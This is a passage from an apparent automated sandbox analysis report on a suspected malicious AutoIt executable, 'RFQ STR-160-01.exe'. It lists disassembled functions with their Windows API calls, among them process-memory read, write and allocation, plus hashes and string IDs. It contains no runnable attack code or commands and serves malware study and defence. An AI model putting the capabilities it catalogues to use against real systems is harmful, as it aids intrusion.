              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: __freea$_free
              • String ID: a/p$am/pm
              • API String ID: 3432400110-3206640213
              • Opcode ID: 81d1498de0e21d2a8345d9d8d2000750dcca600499f64a50a4179da04f32601b
              • Instruction ID: 9bbd53b8a8b5dbc6fce543e05783c5237b759d50c8a2cbc304715ea83b5628b9
              • Opcode Fuzzy Hash: 81d1498de0e21d2a8345d9d8d2000750dcca600499f64a50a4179da04f32601b
              • Instruction Fuzzy Hash: D1D1E235900A46CFCB249FE8C849FBABFB1FB47B04F18495DE501AB642D2759D80CB99
              APIs
                • Part of subcall function 005B0242: EnterCriticalSection.KERNEL32(0066070C,00661884,?,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B024D
                • Part of subcall function 005B0242: LeaveCriticalSection.KERNEL32(0066070C,?,005A198B,00662518,?,?,?,005912F9,00000000), ref: 005B028A
                • Part of subcall function 005B00A3: __onexit.LIBCMT ref: 005B00A9
              • __Init_thread_footer.LIBCMT ref: 00616238
                • Part of subcall function 005B01F8: EnterCriticalSection.KERNEL32(0066070C,?,?,005A8747,00662514), ref: 005B0202
                • Part of subcall function 005B01F8: LeaveCriticalSection.KERNEL32(0066070C,?,005A8747,00662514), ref: 005B0235
                • Part of subcall function 0060359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006035E4
                • Part of subcall function 0060359C: LoadStringW.USER32(00662390,?,00000FFF,?), ref: 0060360A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
              • String ID: x#f$x#f$x#f
              • API String ID: 1072379062-4266588095
              • Opcode ID: 86a059c37e7b05be91ae3dd232f2a1b8a982fd74e6649032b041d1a641c1ba01
              • Instruction ID: ae3085202f16c0dd20b5d9390d4c3ceaf883993772a527096193d4fb1b9a71fe
              • Opcode Fuzzy Hash: 86a059c37e7b05be91ae3dd232f2a1b8a982fd74e6649032b041d1a641c1ba01
              • Instruction Fuzzy Hash: 3BC14C75A00106ABCB14DF58C895EFEBBBAFF48300F148069F9559B291DB70ED85CB90
              APIs
              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 005C8B6E
              • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 005C8B7A
              • __dosmaperr.LIBCMT ref: 005C8B81
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ByteCharErrorLastMultiWide__dosmaperr
              • String ID: .[
              • API String ID: 2434981716-1428149938
              • Opcode ID: 8ad66da75a239b43527828c35aed731b9dae510411922c7c42580d0b43b3478e
              • Instruction ID: e6c0c90580bffbf295bf75b758bd5b24b38b8084e7a402b573483d1a21fef23e
              • Opcode Fuzzy Hash: 8ad66da75a239b43527828c35aed731b9dae510411922c7c42580d0b43b3478e
              • Instruction Fuzzy Hash: 7C416AB0604145AFDB249FA4CC85FBD7FA6FB85318F2885AEF88587242DE719C129790
              APIs
                • Part of subcall function 005FB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F21D0,?,?,00000034,00000800,?,00000034), ref: 005FB42D
              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005F2760
                • Part of subcall function 005FB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 005FB3F8
                • Part of subcall function 005FB32A: GetWindowThreadProcessId.USER32(?,?), ref: 005FB355
                • Part of subcall function 005FB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005F2194,00000034,?,?,00001004,00000000,00000000), ref: 005FB365
                • Part of subcall function 005FB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005F2194,00000034,?,?,00001004,00000000,00000000), ref: 005FB37B
              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F27CD
              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F281A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
              • String ID: @
              • API String ID: 4150878124-2766056989
              • Opcode ID: 3b5a5c429eeb7deaaab58a9fbd46fcce99350d8ad24ecdc6c92af73cf6f464cc
              • Instruction ID: 741427b9915dc354f732b1b1ada207ea96beb1817acfc9d75c70649baa73f44a
              • Opcode Fuzzy Hash: 3b5a5c429eeb7deaaab58a9fbd46fcce99350d8ad24ecdc6c92af73cf6f464cc
              • Instruction Fuzzy Hash: 60413B7290021DAFDB10DBA4CD46AEEBBB8FF49310F108099FA55B7181DB746E45CBA1
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ STR-160-01.exe,00000104), ref: 005C1769
              • _free.LIBCMT ref: 005C1834
              • _free.LIBCMT ref: 005C183E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\RFQ STR-160-01.exe
              • API String ID: 2506810119-1238427604
              • Opcode ID: 7995c119a31a41a1bc24dde454e7edfcdb18405aea65ea566da29e8ad07d322e
              • Instruction ID: e0351ad8d5a66c9df757f50556ad04dac16b5b3ba5a402db07077d325d1a51c1
              • Opcode Fuzzy Hash: 7995c119a31a41a1bc24dde454e7edfcdb18405aea65ea566da29e8ad07d322e
              • Instruction Fuzzy Hash: 9E319F75A04608AFDB21DFD99C85E9EBFFCFB86310B14416AE404D7212D6B09A80CB94
              APIs
              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005FC306
              • DeleteMenu.USER32(?,00000007,00000000), ref: 005FC34C
              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00661990,01806438), ref: 005FC395
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Menu$Delete$InfoItem
              • String ID: 0
              • API String ID: 135850232-4108050209
              • Opcode ID: 7f2d9a961e427f6f213825e63fcc775f1ac0ef480153676f51c36f017f516d5c
              • Instruction ID: d9cc4c2b6979c3e494ed833049204e7cc743402f3b1721b0abb17ed610ff9795
              • Opcode Fuzzy Hash: 7f2d9a961e427f6f213825e63fcc775f1ac0ef480153676f51c36f017f516d5c
              • Instruction Fuzzy Hash: BC417E3120430A9FD724DF25D944B6ABFE8BF85360F148A2DFAA5972D1D734E904CB52
              APIs
              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0062CC08,00000000,?,?,?,?), ref: 006244AA
              • GetWindowLongW.USER32 ref: 006244C7
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006244D7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$Long
              • String ID: SysTreeView32
              • API String ID: 847901565-1698111956
              • Opcode ID: 32e291199dea7bf99729463f4fbba70d4902b1fdcf9051ac9f5551d1a2f8ae7b
              • Instruction ID: 8bdce53d05ee5e65cf1ea6da6501b4ad2b0c6debb16bcb9ce59325a64d8f9c37
              • Opcode Fuzzy Hash: 32e291199dea7bf99729463f4fbba70d4902b1fdcf9051ac9f5551d1a2f8ae7b
              • Instruction Fuzzy Hash: 0231AF31200A26AFDF209E38EC45BDA7BAAEF49334F204315F975A22D0DB70EC519B50
              APIs
              • SysReAllocString.OLEAUT32(?,?), ref: 005F6EED
              • VariantCopyInd.OLEAUT32(?,?), ref: 005F6F08
              • VariantClear.OLEAUT32(?), ref: 005F6F12
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Variant$AllocClearCopyString
              • String ID: *j_
              • API String ID: 2173805711-2925385068
              • Opcode ID: d521d88a91273c25314c4a77bdc8facbb4c17a745527851a1caa34984325b28e
              • Instruction ID: 15252ac5b4c6b936158ef526eb47fd0fae345ea6588913be69d5585366d95368
              • Opcode Fuzzy Hash: d521d88a91273c25314c4a77bdc8facbb4c17a745527851a1caa34984325b28e
              • Instruction Fuzzy Hash: 7C31B37160425ADFDF04AF64E8549BE3FB6FF85300B140898FA024B2A1D7389952DBD0
              APIs
                • Part of subcall function 0061335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00613077,?,?), ref: 00613378
              • inet_addr.WSOCK32(?), ref: 0061307A
              • _wcslen.LIBCMT ref: 0061309B
              • htons.WSOCK32(00000000), ref: 00613106
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
              • String ID: 255.255.255.255
              • API String ID: 946324512-2422070025
              • Opcode ID: db56fbbd7c2cf36c215f2873bb2ea5d4a90fc94228952d16a4c5893a0e94d6ae
              • Instruction ID: 5f272110c802dd61bee3429893549bd248f6648ce5784671a8dbc2c6a68f47c9
              • Opcode Fuzzy Hash: db56fbbd7c2cf36c215f2873bb2ea5d4a90fc94228952d16a4c5893a0e94d6ae
              • Instruction Fuzzy Hash: BF31E7356002119FCB20CF29C586EE97BF2EF59318F28C099E9168B392D771EE85C760
              APIs
              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00624705
              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00624713
              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0062471A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$DestroyWindow
              • String ID: msctls_updown32
              • API String ID: 4014797782-2298589950
              • Opcode ID: 5ca5668b32119a874a718def9d6fec1b2e7bba67ca752177031d41f5c23dcc26
              • Instruction ID: d9d21dd5c7b7870c0a0e1b8d836835aa4e6ef79686b499fae8679a147ed8dbbd
              • Opcode Fuzzy Hash: 5ca5668b32119a874a718def9d6fec1b2e7bba67ca752177031d41f5c23dcc26
              • Instruction Fuzzy Hash: AD215EB5600619AFDB10DF64ECD5DAB3BAEEB9A3A4B040159FA149B351CB70EC11CE60
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen
              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
              • API String ID: 176396367-2734436370
              • Opcode ID: 72ad296d05d593f90a2453dfaecfb082d6568c9e669aa9c73cfe524daf061936
              • Instruction ID: f7536d197789d628f52422206352c98f29aff3a174df33feb96396444ac27be0
              • Opcode Fuzzy Hash: 72ad296d05d593f90a2453dfaecfb082d6568c9e669aa9c73cfe524daf061936
              • Instruction Fuzzy Hash: 3521383210492A66C731AB24DC06FBB7BDDFFD5300F104426FA49DB041EB59AD41C2D5
              APIs
              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00623840
              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00623850
              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00623876
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$MoveWindow
              • String ID: Listbox
              • API String ID: 3315199576-2633736733
              • Opcode ID: f9f03b8d48a8c058b675256f019ae2b50500b674c6344dc14ea2b704a072285e
              • Instruction ID: 67feeb6ff17369d5c0bce4d93671eef03f29beecf5986948c7975bb162bcf59a
              • Opcode Fuzzy Hash: f9f03b8d48a8c058b675256f019ae2b50500b674c6344dc14ea2b704a072285e
              • Instruction Fuzzy Hash: 5B218072610629BBEF218F54EC85EEB376BEF89760F118114F9059B290C779DC528BA0
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 00604A08
              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00604A5C
              • SetErrorMode.KERNEL32(00000000,?,?,0062CC08), ref: 00604AD0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorMode$InformationVolume
              • String ID: %lu
              • API String ID: 2507767853-685833217
              • Opcode ID: 6e45abe668c8286874f531449d40f4a61b5c9a0398fa4a38750a6b146b559cf5
              • Instruction ID: 4dd4ae02ce109d2a15379984ba64008e89b3c7af9cc3a4ae5ee41ccbf270ce91
              • Opcode Fuzzy Hash: 6e45abe668c8286874f531449d40f4a61b5c9a0398fa4a38750a6b146b559cf5
              • Instruction Fuzzy Hash: 40314F71A00109AFDB10DF54C885EAE7BF9EF48314F148099E905DB252DB71EE46CB61
              APIs
              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0062424F
              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00624264
              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00624271
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: msctls_trackbar32
              • API String ID: 3850602802-1010561917
              • Opcode ID: a1a97aad2f28f1ba5f2664d1823b03500257cc5c3a20f6e882706a7906fb844e
              • Instruction ID: fdfd5405447f0fbfb1f37873a368bd9b05062723782e6d3b0b62945cf30772d2
              • Opcode Fuzzy Hash: a1a97aad2f28f1ba5f2664d1823b03500257cc5c3a20f6e882706a7906fb844e
              • Instruction Fuzzy Hash: D2110631240218BEEF205F29DC06FEB3BAEEF85B64F010114FA55E6190D6B1DC219B20
              APIs
                • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                • Part of subcall function 005F2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 005F2DC5
                • Part of subcall function 005F2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F2DD6
                • Part of subcall function 005F2DA7: GetCurrentThreadId.KERNEL32 ref: 005F2DDD
                • Part of subcall function 005F2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 005F2DE4
              • GetFocus.USER32 ref: 005F2F78
                • Part of subcall function 005F2DEE: GetParent.USER32(00000000), ref: 005F2DF9
              • GetClassNameW.USER32(?,?,00000100), ref: 005F2FC3
              • EnumChildWindows.USER32(?,005F303B), ref: 005F2FEB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
              • String ID: %s%d
              • API String ID: 1272988791-1110647743
              • Opcode ID: c4b9452cc1bd3f4dccc1b5c2f9dfed79db5accc1de3e31b9f29ce2ce40eeb780
              • Instruction ID: b33e2d08a4ebb491b4b964c3589d89791404b9dd7e86b8a509f4207cde274df6
              • Opcode Fuzzy Hash: c4b9452cc1bd3f4dccc1b5c2f9dfed79db5accc1de3e31b9f29ce2ce40eeb780
              • Instruction Fuzzy Hash: 5B11A2B160020A6BDF14BF608C89EFD3B6ABFC4314F044075BA099B152DE74994A8B60
              APIs
              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006258C1
              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006258EE
              • DrawMenuBar.USER32(?), ref: 006258FD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Menu$InfoItem$Draw
              • String ID: 0
              • API String ID: 3227129158-4108050209
              • Opcode ID: f3cc16e2e6edd2349897f86539b891934dfaf3e0456a0e990f5cecf49c3dff45
              • Instruction ID: 9cc2ffc3a72e5a16bd773df5441b4fb7d09053bd4c5a3a56211c05643b45fb1b
              • Opcode Fuzzy Hash: f3cc16e2e6edd2349897f86539b891934dfaf3e0456a0e990f5cecf49c3dff45
              • Instruction Fuzzy Hash: C801C431500618EFDB309F51EC44BEEBBBAFF45360F108099E849D6251DB308A95DF20
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4d851a9ba7bfbfab8dc6da4bf329c97a765a8281991303e22ea8e70a16546f42
              • Instruction ID: 3489276465ceee6a94968e81fbf52c9d3ad3b3cd7af10588d894739266ea7cf0
              • Opcode Fuzzy Hash: 4d851a9ba7bfbfab8dc6da4bf329c97a765a8281991303e22ea8e70a16546f42
              • Instruction Fuzzy Hash: E5C15A75A0021AAFCB14CF94C894EBEBBB5FF48314F249598E605EB292C735ED41DB90
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Variant$ClearInitInitializeUninitialize
              • String ID:
              • API String ID: 1998397398-0
              • Opcode ID: bb13eb3325826d5b8d6aa4e713ef60c65a610fc415397090406c328154f53da1
              • Instruction ID: 4b99a7cdab42bb5821b0ae3375d2ed2658a531e9d57e096c9c24e3146645ec83
              • Opcode Fuzzy Hash: bb13eb3325826d5b8d6aa4e713ef60c65a610fc415397090406c328154f53da1
              • Instruction Fuzzy Hash: 72A14B752082119FDB10DF24C585A6ABBE6FF8C710F098859F98A9B361DB30ED41CB91
              APIs
